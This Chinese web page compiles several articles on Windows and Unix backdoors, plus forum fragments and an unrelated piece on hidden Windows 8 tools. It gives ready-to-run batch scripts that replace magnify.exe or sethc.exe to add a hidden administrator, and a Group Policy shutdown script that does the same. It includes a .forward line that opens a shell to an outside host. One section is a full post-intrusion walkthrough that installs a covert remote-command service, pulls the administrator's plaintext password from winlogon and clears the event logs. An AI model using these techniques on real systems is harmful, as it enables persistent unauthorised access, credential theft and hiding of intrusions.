揭秘Windows系统的四个后门

时光的筛子 分享 时间: 收藏本文

【简介】感谢网友“时光的筛子”参与投稿,下面是小编帮大家整理的揭秘Windows系统的四个后门(共5篇),希望对大家有所帮助。

篇1:揭秘Windows系统的四个后门

后门是攻击者出入系统的通道,惟其如此它隐蔽而危险,攻击者利用后门技术如入无人之境,这是用户的耻辱。针对Windows系统的后门是比较多的,对于一般的后门也为大家所熟知。下面笔者揭秘四个可能不为大家所了解但又非常危险的后门。

1、嗅探欺骗,最危险的后门

这类后门是攻击者在控制了主机之后,并不创建新的帐户而是在主机上安装嗅探工具窃取管理员的密码。由于此类后门,并不创建新的帐户而是通过嗅探获取的管理员密码登录系统,因此隐蔽性极高,如果管理员安全意识不高并缺少足够的安全技能的话是根本发现不了的。

(1).安装嗅探工具

攻击者将相应的嗅探工具上传或者下载到服务器,然后安装即可。需要说明的是这些嗅探工具一般体积很小并且功能单一,但是往往被做成驱动形式的,所以隐蔽性极高,很难发现也不宜清除。

(2).获取管理员密码

嗅探工具对系统进行实施监控,当管理员登录服务器时其密码也就被窃取,然后嗅探工具会将管理员密码保存到一个txt文件中。当攻击者下一次登录服务器后,就可以打开该txt文件获取管理员密码。此后他登录服务器就再不用重新创建帐户而是直接用合法的管理员帐户登录服务器。如果服务器是一个Web,攻击者就会将该txt文件放置到某个web目录下,然后在本地就可以浏览查看该文件了。

(3).防范措施

嗅探后门攻击者以正常的管理员帐户登录系统,因此很难发现,不过任何入侵都会留下蛛丝马迹,我们可以启用组策略中的“审核策略”使其对用户的登录情况进行记录,然后通过事件查看器查看是否有可疑时间的非法登录。不过,一个高明的攻击者他们会删除或者修改系统日志,因此最彻底的措施是清除安装在系统中的嗅探工具,然后更改管理员密码。

2、放大镜程序,最狡猾的后门

放大镜(magnify.exe)是Windows /XP/系统集成的一个小工具,它是为方便视力障碍用户而设计的。在用户登录系统前可以通过“Win+U”组合键调用该工具,因此攻击者就用精心构造的magnify.exe同名文件替换放大镜程序,从而达到控制服务器的目的。

通常情况下,攻击者通过构造的magnify.exe程序创建一个管理员用户,然后登录系统。当然有的时候他们也会通过其直接调用命令提示符(cmd.exe)或者系统shell(explorer.exe)。需要说明的是,这样调用的程序都是system权限,即系统最高权限。不过,以防万一当管理员在运行放大镜程序时发现破绽,攻击者一般通过该构造程序完成所需的操作后,最后会运行真正的放大镜程序,以蒙骗管理员。其利用的方法是:

(1).构造批处理脚本

@echo off

net user gslw$ test168 /add

net localgroup administrators gslw$ /add

%Windir%\\system32\\nagnify.exe

exit

将上面的脚本保存为magnify.bat,其作用是创建一个密码为test168的管理员用户gslw$,最后运行改名后的放大镜程序nagnify.exe。

(2).文件格式转换

因为批处理文件magnify.bat的后缀是bat,必须要将其转换为同名的exe文件才可以通过组合键Win+U调用。攻击者一般可以利用WinRar构造一个自动解压的exe压缩文件,当然也可以利用bat2com、com2exe进行文件格式的转换。我们就以后面的方法为例进行演示。

打开命令行,进入bat2com、com2exe工具所在的目录,然后运行命令“bat2com magnify.bat”将magnify.bat转换成magnify.com,继续运行命令“com2exe magnify.com”将magnify.com转换成magnify.exe,这样就把批处理文件转换成和放大镜程序同名的程序文件。

(3).放大镜文件替换

下面就需要用构造的magnify.exe替换同名的放大镜程序文件,由于Windows对系统文件的自我保护,因此不能直接替换,不过Windows提供了一个命令replace.exe,通过它我们可以替换系统文件。另外,由于系统文件在%Windir%\\system32\\dllcache中有备份,为了防止文件替换后又重新还原,所有我们首先要替换该目录下的magnify.exe文件。假设构造的magnify.exe文件在%Windir%目录下,我们可以通过一个批处理即可实现文件的替换。

@echo off

copy %Windir%\\system32\\dllcache\\magnify.exe nagnify.exe

copy %Windir%\\system32\\magnify.exe nagnify.exe

replace.exe %Windir%\\magnify.exe %Windir%\\system32\\dllcache

replace.exe %Windir%\\magnify.exe %Windir%\\system32

exit

上面批处理的功能是,首先将放大镜程序备份为nagnify.exe,然后用同名的构造程序将其替换,

(4).攻击利用

当完成上述操作后,一个放大镜后门就做成了。然后攻击者通过远程桌面连接服务器,在登录界面窗口摁下本地键盘的“Win+U”组合键,选择运行其中的“放大镜”,此刻就在服务器上创建了一个管理员用户gslw$并打开了放大镜工具,然后攻击者就开业通过该帐户登录服务器。当然,攻击者在断开登录前会删除所有与该帐户相关的信息,以防被管理员发现。

(5).防范措施

进入%Windir%\\system32\\查看magnify.exe的文件图标是否是原来的放大镜的图标,如果不是的话极有可能被植入了放大镜后门。当然,有的时候攻击者也会将其文件图标更改为和原放大镜程序的图标一样。此时我们可以查看magnify.exe文件的大小和修改时间,如果这两样有一项不符就比较怀疑了。我们也可以先运行magnify.exe,然后运行lusrmgr.msc查看是否有可疑的用户。如果确定服务器被放置了放大镜后门,首先要删除该文件,然后恢复正常的放大镜程序。当然,我们也可以做得更彻底一些,用一个无关紧要的程序替换放大镜程序。甚至我们也可以以其人之道还治其人之身,构造一个magnify.exe,通过其警告攻击者或者进行入侵监控和取证。

补充:与放大镜后门类似的还有“粘滞键”后门,即按下SHIEF键五次可以启动粘滞键功能,其利用和防范措施与放大镜后门类似,只是将magnify.exe换成了sethc.exe。

3、组策略欺骗,最隐蔽的后门

相对来说,组策略后门更加隐蔽。往册表中添加相应键值实现随系统启动而运行是木马常用的伎俩,也为大家所熟知。其实,在最策略中也可以实现该功能,不仅如此它还可以实现在系统关机时进行某些操作。这就是通过最策略的“脚本(启动/关机)”项来说实现。具体位置在“计算机配置→Windows设置”项下。因为其极具隐蔽性,因此常常被攻击者利用来做服务器后门。

攻击者获得了服务器的控制权就可以通过这个后门实施对对主机的长期控制。它可以通过这个后门运行某些程序或者脚本,最简单的比如创建一个管理员用户,他可以这样做:

(1).创建脚本

创建一个批处理文件add.bat,add.bat的内容是:@echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit (创建一个用户名为gslw$密码为test168的管理员用户)。

(2).后门利用

在“运行”对话框中输入gpedit.msc,定位到“计算机配置一>Windows设置一>脚本(启动/关机)”, 双击右边窗口的“关机”,在其中添加add.bat。就是说当系统关机时创建gslw$用户。对于一般的用户是根本不知道在系统中有一个隐藏用户,就是他看见并且删除了该帐户,当系统关机时又会创建该帐户。所以说,如果用户不知道组策略中的这个地方那他一定会感到莫名其妙。

其实,对于组策略中的这个“后门”还有很多利用法,攻击者通过它来运行脚本或者程序,嗅探管理员密码等等。当他们获取了管理员的密码后,就不用在系统中创建帐户了,直接利用管理员帐户远程登录系统。因此它也是“双刃剑”,希望大家重视这个地方。当你为服务器被攻击而莫名其妙时,说不定攻击者就是通过它实现的。

4、telnet欺骗,最容易被忽略的后门

telnet是命令行下的远程登录工具,不过在服务器管理时使用不多也常为管理员所忽视。攻击者如果在控制一台服务器后,开启“远程桌面”进行远程控制非常容易被管理员察觉,但是启动Telnet进行远程控制却不容易被察觉。不过,telnet的默认端口是23,如果开启后,别人是很容易扫描到的,因此攻击者会更改telnet的端口,从而独享该服务器的控制权。

(1).修改端口

本地修改Windows 2003服务器的telnet端口的方法是:“开始→运行”输入cmd打开命令提示符,然后运行命令“tlntadmn config port=800”(800是修改后的telnet端口,为了避免端口冲突不用设置成已知服务的端口。) 当然,我们也可以远程修改服务器的telnet端口,在命令提示符下输入命令“tlntadmn config \\\\192.168.1.9 port=800 -u gslw -p test168 ”(\\\\192.168.1.9对方IP,port=800要修改为的telnet端口,-u指定对方的用户名,-p指定对方用户的密码。)

(2).远程登录

攻击者在本地运行命令提示符(cmd.exe)输入命令“telnet 192.168.1.9 800”然后输入用户名及其密码记录telnet到服务器。

(3).防范措施

对于telnet后门的方法非常简单,可以通过“tlntadmn config port=n”命令更改其端口,更彻底的运行“services.msc”打开服务管理器,禁用telnet服务。

总结:其实,不管什么样的后门都有一个共同的特点DD隐蔽性,是见不得阳光的。只要大家掌握一定的系统技术,并时刻提高警惕就能让后门显形。知己知彼,了解后门的原理,就能够从根本上终结后门。

篇2:........Windows系统

........

CNL 回复于:-10-21 16:28:36谢谢共享,需要的快看啦!

AnEagle 回复于:2004-10-27 17:21:25具体的实施步骤和分析见“濉溪县农信联社业务网主机系统性能优化实施方案”

楼主太幽默了,在哪里找到的?

zhaobincn 回复于:2004-11-07 02:26:00SKKEEP兄弟 你已收藏完了吧

zhyesno 回复于:2004-11-07 08:44:29呵呵,收藏一下,

........Windows系统

。。:)

原文转自:www.ltesting.net

篇3:系统后门的真面目

CMP Shell 后门

Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一. 许多防火墙允 许外界ping它内部的机器. 入侵者可以放数据入Ping的ICMP包, 在ping的机器间 形成一个shell通道. 管理员也许会注意到Ping包暴风, 但除了他查看包内数据, 否者入侵者不会暴露.

加密连接

管理员可能建立一个sniffer试图某个访问的数据, 但当入侵者给网络通行后门加 密后,就不可能被判定两台机器间的传输内容了.

Windows NT

由于Windows NT不能轻易的允许多个用户象Unix下访问一台机器, 对入侵者来说 就很难闯入Windows NT,安装后门,并从那里发起攻击. 因此你将更频繁地看到广 泛的来自Unix的网络攻击. 当Windows NT提高多用户技术后, 入侵者将更频繁地 利用WindowsNT.如果这一天真的到来, 许多Unix的后门技术将移植到Windows N T 上, 管理员可以等候入侵者的到来. 今天, Windows NT已经有了telnet守护程 序 . 通过网络通行后门, 入侵者发现在Windows NT安装它们是可行的. ( With Net work Traffic backdoors, theyarevery feasible for intruders to inst all on Windows NT. 此处该如何翻译?

:( 解决 当后门技术越先进, 管理员越难于判断入侵者是否侵入后者他们是否被成功封杀 .

评估

首先要做的是积极准确的估计你的网络的脆弱性, 从而判定漏洞的存在且修复之 .许多商业工具用来帮助扫描和查核网络及系统的漏洞. 如果仅仅安装提供商的 安 全补丁的话,许多公司将大大提高安全性.

MD5基准线

一个系统(安全)扫描的一个重要因素是MD5校验和基准线. MD5基准线是在 入 侵前由干净 系统建立. 一旦 入侵并建立了后门再建立基准线, 那么后门也 被合并进去了 .一些公司被入侵且系统被安置后门长达几个月.所有的系统备份多 包含了后门. 当公司发现有 并求助备份祛除后门时, 一切努力是徒劳的, 因 为他们恢复系 统的同时也恢复了后门. 应该在入侵发生前作好基准线的建立.

入侵检测

随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要. 以前多数入侵检测技术是基于日志型的. 最新的入侵检测系统技术(IDS)是基于 实 时侦听和网络通行安全分析的. 最新的IDS技术可以浏览DNS的UDP报文, 并判 断是 否符合DNS协议请求. 如果数据不符合协议, 就发出警告信号? 取数据进 行进一 步分析. 同样的原则可以运用到ICMP包, 检查数据是否符合协议要求, 或 者是否 装载加密shell会话.

从CD-ROM启动

一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性.这种方法的问题是实现的费用和时间够企业面临的.

警告 由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击 和安置后门技术, 安枕无忧的安全技术是没有的.请记住没有简单的防御,只有不 懈的努力! ( Be aware that no defense is foolproof, and that there is no substitu te for diligent attention. 此句该如何翻译? :( )

you may want to add:

forward Backdoor

On Unix machines, placing commands into the .forward file was also

a common method of regaining access. For the account ``username

a .forward file might be constructed as follows:

\\username

|“/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh”

permutations of this method include alteration of the systems mail ali ases file (most commonly located at /etc/aliases). Note that this is a simple permutation, the more advanced can run a simple script. from the forward file that can take arbitrary commands via stdin (after minor

preprocessing).

PS: The above method is also useful gaining access a companies mailhub (assuming there is a shared a home directory FS on the client and ser ver).

$#@62; Using smrsh can effectively negate this backdoor (although its quite

$#@62; possibly still a problem if you allow things like elms filter or

$#@62; procmail which can run programs themselves...).

你也许要增加:

.forward后门

Unix下在.forward文件里放入命令是重新获得访问的常用方法. 帐户usernam e 的 .forward可能设置如下:

\\username

|“/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh”

这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后). $#@62;利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elms filter或 procmail$#@62;类程序, 很有可能还有问题

......)

( 此段的内容理解不深, 故付上英文, 请指教! )

你也许能用这个“特性”做后门:

当在/etc/password里指定一个错误的uid/gid后, 大多数login(1)的实现是不能 检查出这个错误 的uid/gid, 而atoi(3)将设uid/gid为0, 便给了超级用户的权 利.

例子:

rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh 在Linux里,这将把用户 rmartin的uid设为0.

篇4:Windows 入侵后后门的放置

在阅读本文之前,假设你已经成功入侵了某台Win2k主机并取得了管理员帐号,大多数时候我们入侵某台主机的目的并不是为了直接破坏,可以在该主机上留下后门以便自己以后可以方便的“使用”该机。目前一般情况下,入侵Win2k后使用最多的后门是RemoteNc了,但该工具有一很大的缺点,容易被杀毒软件查出,而且如果用fport或Active Ports等软件也可以看到它监听的端口,这很容易让管理员发现。对于Win2k下的后门推荐使用Win2k Resoruce Kit中自带的一个小工具rcmdsvc.exe和rcmd.exe,这是微软自己出的一个用来在命令行下远程管理主机的小工具。它有以下优点:

1、不会被杀毒软件认为是病毒或后门程序,毕竟这是微软自己出的东西。

2、非常隐蔽,它开的端口是445,和Win2k系统的Microsoft-DS服务开的端口一样,用fport或Active Ports都不能列出它正在监听的端口。

下面我们来看一次实际的操作

当然进行以下操作之前假设已经具有以下条件:

1、你已经取得了xxx.xxx.xxx.xxx的管理员权限

2、该机启用了tcp/ip上的Netbios支持

3、在IP安全策略中对139和445端口未进行屏蔽

4、安全策略中对匿名连接的额外限制采用的是默认的安全选项/*如果后三条中有某条不能满足,那么会让我们的后续操作有些困难,不过仍然有其它办法可以继续,如果大家感兴趣我会在以后的文章中说明。

c:\\>net use z: \\\\xxx.xxx.xxx.xxx “password” /user:“administrator”

c:\\>copy rcmdsvc.exe z:\\winnt\\system32

c:\\>copy pulist.exe z:\\winnt\\system32

c:\\>copy findpass.exe z:\\winnt\\system32

c:\\>copy kill.exe z:\\winnt\\system32

c:\\>copy clearel.exe z:\\winnt\\system32

c:\\>copy clealog.cmd z:\\winnt\\system32

c:\\>copy fpipe.exe z:\\winnt\\system32

c:\\>copy msvcp60.dll z:\\winnt\\system32

拷贝一些常用的工具到对方服务器上,在这里对这些工具做一个简要说明:

rcmdsvc.exe Win2k Resource Kit中的远程命令行服务器端程序

pulist.exe 可以列出系统进程和该进程所属用户的工具

findpass.exe 可以在winlogon.exe进程中查找指定用户名的名文口令的工具

kill.exe 可以用pdi或进程名杀掉指定进程的工具

clearel.exe 清除系统、应用程序、安全日志的工具

clealog.cmd 同上

fpipe.exe 可以在命令行下做端口重定向的工具

msvcp60.dll vc的运行库,这个东西其实不是必须的,但为了防止在某些缺少

msvcp60.dll的机上在运行clealog清除日志时对方的机上会突然弹出一个对话框说缺少msvcp60.dll的尴尬情况,最好把它一起复制过去。

c:\\>sc \\\\xxx.xxx.xxx.xxx create “Remote Command Service” binpath=

c:\\winnt\\system32\\rcmdsvc.exe type= own start= auto

在这里我们用sc在目标机xxx.xxx.xxx.xxx上创建了一个名为Remote Command Service的服务,启动方式为自动。当然为了隐蔽,你最好把“Remote Command Service”这个服务名改成其它比较类似系统服务的名字,毕竟管理员不可能看着一个突然多出来的Remote Command而坐视不管,而且也显的你太嚣张了。

ps:sc.exe是Win2k Resource Kit中一个功能非常强大的对服务进行控制的工具,

详细的使用方法可以参考本站的《sc使用完全指南》。

c:\\>sc \\\\xxx.xxx.xxx.xxx start “Remote Command Service”

SERVICE_NAME: rpc support services

TYPE : 10 WIN32_OWN_PROCESS

STATE : 2 START_PENDING

(NOT_STOPPABLE,NOT_PAUSABLE,

IGNORES_SHUTDOWN)

WIN32_EXIT_CODE : 0 (0x0)

SERVICE_EXIT_CODE : 0 (0x0)

CHECKPOINT : 0x0

WAIT_HINT : 0x7d0

在这里我们用sc启动刚才创建的Remote Command Service服务。 下面连上对方服务器

c:\\>rcmd

Enter Server Name : xxx.xxx.xxx.xxx

Connect to \\\\xxx.xxx.xxx.xxx

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985- Microsoft Corp.

C:\\Documents and Settings\\Default User.WINNT>pulist

Process PID User

Idle 0

System 8

smss.exe 168 NT AUTHORITY\\SYSTEM

csrss.exe 192 NT AUTHORITY\\SYSTEM

winlogon.exe 212 NT AUTHORITY\\SYSTEM

services.exe 240 NT AUTHORITY\\SYSTEM

lsass.exe 252 NT AUTHORITY\\SYSTEM

svchost.exe 408 NT AUTHORITY\\SYSTEM

spoolsv.exe 436 NT AUTHORITY\\SYSTEM

msdtc.exe 464 NT AUTHORITY\\SYSTEM

svchost.exe 596 NT AUTHORITY\\SYSTEM

llssrv.exe 624 NT AUTHORITY\\SYSTEM

regsvc.exe 676 NT AUTHORITY\\SYSTEM

rpcsvc.exe 692 NT AUTHORITY\\SYSTEM

mstask.exe 716 NT AUTHORITY\\SYSTEM

LSESS.EXE 792 NT AUTHORITY\\SYSTEM

tlntsvr.exe 832 NT AUTHORITY\\SYSTEM

VrUpSvr.exe 956 NT AUTHORITY\\SYSTEM

winmgmt.exe 968 NT AUTHORITY\\SYSTEM

dns.exe 980 NT AUTHORITY\\SYSTEM

dfssvc.exe 1064 NT AUTHORITY\\SYSTEM

POP3S.exe 1100 NT AUTHORITY\\SYSTEM

smtpds.exe 1120 NT AUTHORITY\\SYSTEM

svchost.exe 1384 NT AUTHORITY\\SYSTEM

dllhost.exe 1316 NT AUTHORITY\\SYSTEM

internat.exe 1308 SERVER\\Administrator

conime.exe 1680 SERVER\\Administrator

VRMONSVC.EXE 872 NT AUTHORITY\\SYSTEM

inetinfo.exe 1456 NT AUTHORITY\\SYSTEM

explorer.exe 1548 SERVER\\Administrator

cmd.exe 1712 SERVER\\Guest

pulist.exe 532 SERVER\\Guest

我们可以看到winlogon.exe的进程号是212

C:\\Documents and Settings\\Default User.WINNT>findpass server

administrator 212

To Find Password in the Winlogon process

Usage: fidp DomainName UserName PID-of-WinLogon

The debug privilege has been added to PasswordReminder.

The WinLogon process id is 214 (0x000000d6).

To find server\\administrator password in process 214 ...

The encoded password is found at 0x01a00800 and has a length of 3.

The logon information is: server/administrator/Tgrh87fd.

The hash byte is: 0xb8.

在winlogon中查找administrator的名文口令

C:\\Documents and Settings\\Default User.WINNT>clealog

clealog done

清除日志记录

C:\\Documents and Settings\\Default User.WINNT>

到这里我们已经看到administrator的密码是Tgrh87fd

至此我们拿到了管理员的密码并安放了一个rcmdsvc的后门,当然你还可以接着做许多事,

比如利用Adam发现的Bug再克隆一个管理员账号。或者用sc把对方的Tlntsvr服务启起来。不过后者比较容易被发现,不推荐。如果你对他的内网的某台机感兴趣而且该机也有漏洞,可以用fpipe做端口重定向后为下一步的进攻做准备

篇5:Windows 8系统小技巧 隐藏小工具大揭秘

在已知的 Win8 开发体系中,存在着很多与以往完全不同的设计,比如类似 WP7 的 Metro UI、能够读取 PDF 的内置 PDF 阅读器、运行于浏览器之上的 WebCam 以及全新内置的桌面分屏等等,不过由于目前 Win8 的版本还比较原始,各模块的功能也不够强大,因此这些功能大多以文件形式散落在 Win8 的系统目录中。

▲windows 8

不过说了不看总让人心里难受,下面不妨就和笔者一起体验一下这些神秘工具的风采吧。

一、屏幕分屏

分屏软件大家都知道,可以帮助我们快速实现类似 Android 那样的多桌面操作,尤其在工作繁忙的 White Collar 圈中颇为流行。

在 Win8 Pre-M3 7955 中,笔者发现在 C:Sysint 文件夹下隐藏着一个名为“Desktops.exe”的小文件,试用后才发现,这其实竟是微软内置的一个分屏小工具。

双击文件后会首先弹出一个许可协议,确认后会打开快捷键设置框,在这里我们可以设置虚拟桌面的切换键以及是否开机启动等选项。

从界面上看,这款小工具的开发商为 Sysinternals.com,别以为这是什么跑江湖的小公司,它的前身可是大名鼎鼎的 Winternals,只是 2006 年后被微软收购。

显然从这一点上看,Win8 未来集成屏幕分屏的机率还是很大的。

软件的功能非常简单,几乎没有什么特别的设计,我们可以借助快捷键在任意时间切换到任意桌面,而且每一个桌面都具备了一定的个性化保存功能,比如个性化壁纸、专属任务栏等等。

不过桌面图标仍是共享、这一点与其他专业工具相比还有差距。而除了快捷键外,我们也能点击系统托盘中的软件图标切换桌面。

所不同的是这种方法会弹出一个预览窗格,通过用鼠标点击缩略图完成切换。

二、PDF阅读器

和分屏软件一样,PDF 阅读器也是位于 C:Program FilesMcrosoftWindows.glcnd 下的一个小文件,名为“glcnd.exe”。

不过双击后的界面可能会让你大感失望,因为除了顶端一个“PDF”标识外,这里甚至没有一个图标或按钮。

要想调出完整界面需要组合键 Ctrl+Shift+F9,然后通过 Ctrl+O 打开一个 PDF 文件。这时你会发现眼前这款阅读器开始有了一些小变化。

首先是最右侧弹出的位置指示栏,能够将整份文档的页码列在这里,同时也能通过一个滑块指示当前所处位置。

其次是左上角的快速返回钮,它的作用更加简单,就是将用户直接带回上一次所处的位置。

除此之外,这款内置 PDF 阅读器还隐藏着一些小命令。

比如可以通过 Ctrl+1/2/0 在“实际大小/适合宽度/适合高度”三个显示比例间切换、通过 Ctrl+R 实现文档的旋转显示、通过 Ctrl+P 一键激活快速打印等等,

总之唯一与泄漏图不符的,就是笔者尚未找到多页并列显示的选项。

三、Metro浏览器

很多人都知道 Win8 采用全新的 Metro 界面,但到目前为止,真正摆在大家眼前的还只是进入 M3 版后的系统设置选框。

其实在 Win8 Pre-M3 的内部,还隐藏着一个使用了 Metro 界面的浏览器预览版,事实上这也曾被一些网友看作是 IE10 的前奏!

浏览器同样是以文件方式提供,位于 C:Program FilesMicrosoftImmersive BrowserMicrosoft.ImmersiveBrowser,文件名为 miexplore.exe 。

双击文件后你会发现桌面并没有任何提示,其实这也需要按动组合键 Ctrl+Shift+F9。

由于还只是预览版,因此整个浏览器的功能很少,甚至连移动一下窗体位置都不行。

可以看到工具栏和 IE9 很像,保留了“前进”、“后退”、“刷新”、“地址栏”、“收藏夹”五个模块,而且按钮风格活脱脱就是 WP7 的一个翻版,这也验证了之前 Win8 将全面采用 Metro UI 的传闻。

地址栏的变化比较抢眼,几乎就是 将WP7 的方块 UI 移植了过来,而功能上则和传统地址栏没有区别。

不过笔者认为,这样的界面虽然很适合触摸使用,但显然并不会对鼠标操作有什么帮助,而且过大的按钮其实也限制了新 IE 的功能发展(比如智能地址栏),这一点恐怕还需要微软再作权衡。

至于其他地方笔者也简单测试了一下,不过很可惜目前能用的功能实在太少,以至于我们都无法截出张像样的图来。

可以看到右键菜单依旧保持着老版模样,换句话说这款浏览器要想真正示人,恐怕还需要我们等上不短的日子。

四、WebCam

WebCam 在英语中一般是指网络摄像头,但 Win8 的 WebCam 则可以看作是一款能在浏览器中运行的摄像头软件。不过鉴于目前的预览版身份,我们仍旧只能先以文件方式体验。

和其他几个模块一样,WebCam 也是位于 C:WindowsSystem32 下的一个文件,双击即可运行,但一个比较简单的方法是直接在开始菜单搜索栏中输入“Webcam”。

和其他几个模块一样,启动 WebCam 后我们依然需要组合键 Ctrl+Shift+F9 才能调出。界面设计似乎与之前的泄漏版不同,总体来看还是可圈可点的。

在界面右侧,可以看到 WebCam 提供了 3 项功能,“录像”、“拍照”和“定时拍照”。其中“录像”和“定时拍照”都是 3 秒钟预等待,停止后能够马上执行预览。

在界面顶端,分别是“Application Settings”(程序设置)和“Webcam Settings”(摄像头设置),顾名思义就是 WebCam 程序设置(如音频来源、视频分辨率、帧率等)以及摄像头的属性设置(比如亮度、放大、锐化、防闪烁等)。当然由于缺少了一些新功能,眼前这款 WebCam 显然并不像其他功能一样拥有看点。

相关专题 后门系统